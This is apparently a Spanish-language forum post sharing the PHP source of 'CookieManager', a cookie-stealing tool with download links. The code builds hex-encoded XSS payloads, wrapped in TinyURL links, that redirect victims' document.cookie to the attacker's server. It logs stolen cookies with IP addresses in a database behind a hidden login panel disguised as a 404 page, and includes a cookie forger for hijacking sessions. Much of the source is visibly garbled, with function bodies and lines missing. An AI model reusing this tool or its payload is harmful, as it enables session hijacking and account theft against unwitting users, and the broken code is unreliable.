- Cookie Stealer con generador de TinyURL
- Pueden ver los cookies que les devuelve una pagina
- Pueden crear cookies con los datos que quieran
- Panel oculto con login para entrar usen ?poraca para encontrar al login
Un video con ejemplos de uso :
El codigo :
Código
<?php // CookieManager 0.5 // (C) Doddy Hackman 2015 //Datos para el login $username = "admin"; $password = "21232f297a57a5a743894a0e4a801fc3"; //admin // //Datos para la DB $host = "localhost"; $userw = "root"; $passw = ""; $db = "cookies"; // // Functions function hex_encode($text) { } function parsear_cookie($leyendo) { $nombre = ""; $valor_cookie = ""; $expires = ""; $path = ""; $domain = ""; $secure = "false"; $httponly = "false"; foreach ($contenido as $valor) { $expires = $regex[1]; } $path = $regex[1]; $domain = $regex[1]; $secure = $regex[1]; $httponly = $regex[1]; } else { $nombre = $regex[1]; $valor_cookie = $regex[2]; } } } $nombre, $valor_cookie, $expires, $path, $domain, $secure, $httponly ); } function ver_cookies_de_pagina($pagina) { $cookies = ""; 'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0' ) ); foreach ($http_response_header as $valores) { $cookies = $cookies . $valores . "<br>"; } } } else { curl_setopt($nave, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"); foreach ($leyendo as $valores) { $cookies = $cookies . $valores . "<br>"; } } } return $cookies; } function toma($target) { $code = ""; curl_setopt($nave, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0'); } else { 'user_agent' => 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0' ) ); } return $code; } // error(); } if ($ip == "::1") { $ip = "127.0.0.1"; } mysql_query("INSERT INTO todo(id,fecha,ip,info,cookie) values(NULL,'$dia','$ip','$info','$cookie')"); } $user = $plit[0]; $pass = $plit[1]; if ($user == $username and $pass == $password) { //setcookie($_POST['name_cookie'],$_POST['value_cookie'],$_POST['expire_cookie'],$_POST['path_cookie'],$_POST['domain_cookie'],$_POST['secure_cookie'],$_POST['httponline_cookie'])) { echo "<script>alert('Cookies Maked');</script>"; } else { echo "<script>alert('Error making Cookie');</script>"; } } echo "<title>CookieManager 0.3</title>"; echo "<STYLE type=text/css> body,a:link { background-color: #000000; color:orange; Courier New; cursor:crosshair; font-size: small; } input,table.outset,table.bord,table,textarea,select,fieldset,td,tr { font: normal 10px Verdana, Arial, Helvetica, sans-serif; background-color:black; color:orange; border: solid 1px orange; border-color:orange } a:link,a:visited,a:active { color: orange; font: normal 10px Verdana, Arial, Helvetica, sans-serif; text-decoration: none; } </style> "; $edit_name = ""; $edit_value = ""; $edit_expire = ""; $edit_path = ""; $edit_domain = ""; $edit_secure = ""; $edit_httponline = ""; $todo = "create table todo ( id int(10) UNSIGNED NOT NULL AUTO_INCREMENT, fecha TEXT NOT NULL, ip TEXT NOT NULL, info TEXT NOT NULL, cookie TEXT NOT NULL, PRIMARY KEY (id)); "; echo "<script>alert('Installed');</script>"; } else { echo "<script>alert('Error');</script>"; } } // echo "<script>alert('Deleted');</script>"; } else { echo "<script>alert('Error');</script>"; } } } echo "<center>"; echo "<br><h1>CookieManager</h1><br>"; // Cookies Found if ($con == 0) { echo "<script>alert('Cookies not found');</script>"; } else { echo "<table border=1 width=1100><td width=1100><center><h2>Cookies Found : $con</h2></center></table>"; echo "<table border=1 width=1100>"; echo "<td><b>ID</b></td><td><b>Date</b></td><td><b>IP</b></td><td><b>Data</b></td><td><b>Cookie</b></td><td><b>Name</b></td><td><b>Value</b></td><td><b>Option</b></td><tr>"; $cookies_view = $ver[4]; list($nombre, $valor_cookie, $expires, $path, $domain, $secure, $httponly) = parsear_cookie($cookies_view); echo "<td>" . htmlentities($ver[0]) . "</td><td>" . htmlentities($ver[1]) . "</td><td>" . htmlentities($ver[2]) . "</td><td>" . htmlentities($ver[3]) . "</td>"; echo "<td>" . htmlentities($cookies_view) . "</td><td>" . htmlentities($nombre) . "</td><td>" . htmlentities($valor_cookie) . "</td><td><a href=?del=" . htmlentities($ver[0]) . ">Del</a></td><tr>"; } echo "</table>"; } // // Form para target echo " <form action='' method=POST> <center><br><table border=1> <td><center><h2>Enter Target</h2></center></td><tr> <td><input type=text size=50 name=target value='http://localhost/dhlabs/xss/index.php?msg='=></td><tr> <td><input type=submit name=getcookies style='height: 25px; width: 100px' value='Get Cookies'><input type=submit name=generateurl style='height: 25px; width: 100px' value=Generate URL></td> </table></center> </form> "; // URLS echo "<br><table border=1> <td><center><h2>URL Generated</h2></center></td><tr> <td><textarea cols=50 name=code readonly>\n"; $script = hex_encode("<script>document.location='http://" . $_SERVER['HTTP_HOST'] . $_SERVER['PHP_SELF'] . "?id='+document.cookie;</script>"); //echo "http://tinyurl.com/api-create.php?url=".$_POST['target'].$script."\n"; $resultado_code = toma("http://tinyurl.com/api-create.php?url=" . $_POST['target'] . $script); echo "\n</textarea></td></table>"; } // // Get Cookies echo "<br><table border=1> <td><center><h2>Console</h2></center></td><tr> <td><textarea cols=50 rows=10 name=code readonly>\n"; $resultado_code = ver_cookies_de_pagina($_POST['target']); echo "\n</textarea></td></table>"; list($nombre, $valor_cookie, $expires, $path, $domain, $secure, $httponly) = parsear_cookie($leyendo_esto[0]); $edit_name = $nombre; $edit_value = $valor_cookie; $edit_expire = $expires; $edit_path = $path; $edit_domain = $domain; $edit_secure = $secure; $edit_httponline = $httponly; } // // Form para crear cookies echo " <form action='' method=POST> <center><br><table border=1> <td><center><h2>Cookies Maker</h2></center></td><tr> <td>Name : <input type=text size=50 name=name_cookie value='$edit_name'=></td><tr> <td>Value : <input type=text size=50 name=value_cookie value='$edit_value'=></td><tr> <td>Expires : <input type=text size=50 name=expire_cookie value='$edit_expire'=></td><tr> <td>Path : <input type=text size=50 name=path_cookie value='$edit_path'=></td><tr> <td>Domain : <input type=text size=50 name=domain_cookie value='$edit_domain'=></td><tr> <td>Secure : <input type=text size=50 name=secure_cookie value='$edit_secure'=></td><tr> <td>HTTP Online : <input type=text size=50 name=httponline_cookie value='$edit_httponline'=></td><tr> <td><input type=submit name=makecookies style='height: 25px; width: 100px' value='Make Cookies'></td> </table></center> </form>"; // // echo "<br><h1>(C) Doddy Hackman 2015</h1><br><br>"; // } else { echo " <center><br><br> <form action='' method=POST> <h2>Deseas instalar CookieManager ?</h2><br><br> <input type=submit name=instalar value=Instalar> </form>"; } } echo "<script>alert('Welcome idiot');</script>"; echo '<meta http-equiv="refresh" content=0;URL=>'; } else { echo "<script>alert('Continued to participate');</script>"; } echo " <STYLE type='text/css'> body,input { background-color: #000000; color:orange; font-family: Courier New; cursor:crosshair; font-size: small; } </style> <h1><br><center><font color=green>Login</font></center></h1> <br><br><center> <form action='' method=POST> Username : <input type=text name=user><br> Password : <input type=password name=password><br><br> <input type=submit name=login value=Enter><br> </form> </center><br><br>"; } else { error(); } function error() { echo '<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL was not found on this server.</p> </body></html>'; } // The End ? ?>
Si quieren bajar el programa lo pueden hacer de aca :
SourceForge.
Github.